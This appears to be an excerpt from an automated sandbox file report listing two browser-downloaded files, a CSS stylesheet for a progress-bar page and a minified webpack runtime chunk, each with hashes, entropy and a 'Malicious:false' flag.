                          Preview:body {.. font-family: Arial, sans-serif;.. text-align: center;.. padding: 50px;.. background-color: #f9f9f9;..}.....container {.. max-width: 600px;.. margin: auto;.. padding: 20px;.. background: white;.. border-radius: 8px;.. box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);..}....h1 { .. color: #333; ..}....p {.. font-size: 18px;.. color: #555;.. transition: opacity 0.5s ease-in-out; /* . Smooth fade-out */..}.....hidden {.. opacity: 0;.. pointer-events: none;..}.....progress-container {.. width: 60%; /* . Reduced width of the bar */.. max-width: 400px;.. height: 20px;.. background-color: #f3f3f3;.. position: relative;.. border-radius: 10px;.. margin: 20px auto;.. overflow: hidden;..}.....progress-bar {.. width: 0%;.. height: 100%;.. background-color: #0078D4;.. transition: width 3s linear; /* . Smooth transition over 3 seconds */.. border-radius: 10px;..}.....progress-text {.. position: absolut
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (1591)
                          Category:downloaded
                          Size (bytes):1999
                          Entropy (8bit):5.298912754114967
                          Encrypted:false
                          SSDEEP:
                          MD5:4A24B61C6D07899AE670CE7B6BBBE2F8
                          SHA1:DFF69E36C2E653DFD7A79B042E3C70C3B874C04A
                          SHA-256:E58F776F2252A4C0A32AB5CD99AA58A8337A80647288D331F868111B94B0ECB7
                          SHA-512:605CF6466EC62F8DB7F48333B195DD961AA6F51D208A7EEDAD22C5E3838F4D41EF21D5969BADB39973258CE12CFEC3FF553A35C099FDD24CEE4A427BD5193FFD
                          Malicious:false
                          Reputation:unknown
                          URL:https://oka.greenthreads.hr/_next/static/chunks/webpack-ee7e63bc15b31913.js
                          Preview:!function(){"use strict";var e,n,r,t,o={},u={};function i(e){var n=u[e];if(void 0!==n)return n.exports;var r=u[e]={exports:{}},t=!0;try{o[e](r,r.exports,i),t=!1}finally{t&&delete u[e]}return r.exports}i.m=o,e=[],i.O=function(n,r,t,o){if(r){o=o||0;for(var u=e.length;u>0&&e[u-1][2]>o;u--)e[u]=e[u-1];e[u]=[r,t,o];return}for(var f=1/0,u=0;u<e.length;u++){for(var r=e[u][0],t=e[u][1],o=e[u][2],c=!0,l=0;l<r.length;l++)f>=o&&Object.keys(i.O).every(function(e){return i.O[e](r[l])})?r.splice(l--,1):(c=!1,o<f&&(f=o));if(c){e.splice(u--,1);var a=t();void 0!==a&&(n=a)}}return n},i.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(n,{a:n}),n},i.d=function(e,n){for(var r in n)i.o(n,r)&&!i.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},i.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),i.o=function(e,n){return Object.prototype.hasOwn
                          No static file info